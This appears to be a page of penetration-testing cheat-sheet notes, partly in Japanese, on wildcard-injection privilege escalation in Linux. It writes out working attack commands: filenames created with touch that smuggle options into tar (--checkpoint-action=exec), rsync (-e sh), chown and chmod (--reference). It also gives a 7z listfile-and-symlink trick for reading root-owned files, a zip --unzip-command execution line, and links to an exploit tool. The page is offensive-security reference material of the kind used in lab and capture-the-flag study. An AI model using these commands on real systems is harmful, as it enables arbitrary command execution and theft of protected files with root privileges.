Wildcards Spare tricks

chown, chmod

どのファイルの所有者と権限を他のファイルにコピーしたいかを指定できます

touch "--reference=/my/own/path/filename"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (combined attack) More info in https://www.exploit-db.com/papers/33930

Tar

任意のコマンドを実行する:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

この脆弱性を利用することができます https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar攻撃) 詳細は https://www.exploit-db.com/papers/33930 を参照してください。

Rsync

任意のコマンドを実行する:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine

touch "-e sh shell.sh"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(_rsync attack) More info in https://www.exploit-db.com/papers/33930

7z

7z では、-- を * の前に使用しても（-- は次の入力がパラメータとして扱われないことを意味するので、この場合はファイルパスのみ）、任意のエラーを引き起こしてファイルを読み取ることができます。したがって、次のようなコマンドが root によって実行されている場合：

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

そして、これが実行されているフォルダーにファイルを作成することができ、@root.txtというファイルと、読みたいファイルへのシンボリックリンクであるroot.txtというファイルを作成することができます：

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

その後、7z が実行されると、root.txt を圧縮すべきファイルのリストを含むファイルとして扱います（それが @root.txt の存在が示すことです）そして、7z が root.txt を読むと、/file/you/want/to/read を読み込み、このファイルの内容がファイルのリストでないため、エラーを投げて 内容を表示します。

詳細は HackTheBox の CTF ボックスの Write-ups にあります。

Zip

任意のコマンドを実行する:

zip name.zip files -T --unzip-command "sh -c whoami"